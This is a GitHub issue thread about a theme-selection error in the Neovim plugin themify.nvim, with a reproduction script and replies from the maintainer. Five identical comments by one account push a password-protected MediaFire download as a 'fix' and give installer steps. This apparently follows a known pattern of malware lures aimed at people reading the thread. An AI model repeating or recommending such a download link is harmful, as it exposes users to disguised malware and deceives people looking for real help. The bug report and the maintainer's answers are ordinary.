### ISSUE TITLE
Can't select theme

### ISSUE THREAD

**Issue by mimikun** [LmanTW/themify.nvim#1]
Hi
Thank you very good plugin!

An error has occurred and I cannot select a theme.

```txt
E5108: Error executing lua ...e/lazy/themify.nvim/lua/themify/interface/pages/home.lua:57: attempt to index local 'line' (a nil value)
stack traceback:
	...e/lazy/themify.nvim/lua/themify/interface/pages/home.lua:57: in function 'hover'
	.../site/lazy/themify.nvim/lua/themify/interface/window.lua:119: in function 'move_cursor'
	[string ":lua"]:1: in main chunk
```

<details>
<summary> repro.lua </summary>

```lua
-- DO NOT change the paths and don't remove the colorscheme
local root = vim.fn.fnamemodify("./.repro", ":p")

-- set stdpaths to use .repro
for _, name in ipairs({ "config", "data", "state", "cache" }) do
    vim.env[("XDG_%s_HOME"):format(name:upper())] = root .. "/" .. name
end

-- bootstrap lazy
local lazypath = root .. "/plugins/lazy.nvim"
if not vim.loop.fs_stat(lazypath) then
    vim.fn.system({ "git", "clone", "--filter=blob:none", "https://github.com/folke/lazy.nvim.git", lazypath })
end
vim.opt.runtimepath:prepend(lazypath)

-- install plugins
local plugins = {
    "https://github.com/LmanTW/themify.nvim",
}

require("lazy").setup(plugins, {
    root = root .. "/plugins",
    concurrency = 1,
    git = {
        timeout = 300,
    },
})

require("themify").setup({
    "folke/tokyonight.nvim",
    "sho-87/kanagawa-paper.nvim",
    "Yazeed1s/minimal.nvim",
    "EdenEast/nightfox.nvim",
})
```

usage: `cd /tmp; nvim -u repro.lua`

</details>

P.S.
If it is still in development, please write "WORK IN PROGRESS" at the top of the README.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by LmanTW** [comment]
Thanks for the issue! Before the bug is fixed, installing the colorschemes (`I`) should solve the problem!

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by LmanTW** [comment]
It should be fixed, please let me know if it works for you!

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by mimikun** [comment]
It will not be displayed at first launch.

![image](https://github.com/user-attachments/assets/23a330c6-1726-48e9-b0e2-9531b2e55187)

But, when I press I it started to show themes.

![image](https://github.com/user-attachments/assets/57cad2ff-fb35-4c94-b543-44fa4db7e528)

**Comment by LmanTW** [comment]
Yes, that is expected. The colorschemes will not appear on the home page (the Themify page) until you have installed them. If they still disappears after you have installed them then it's a bug.
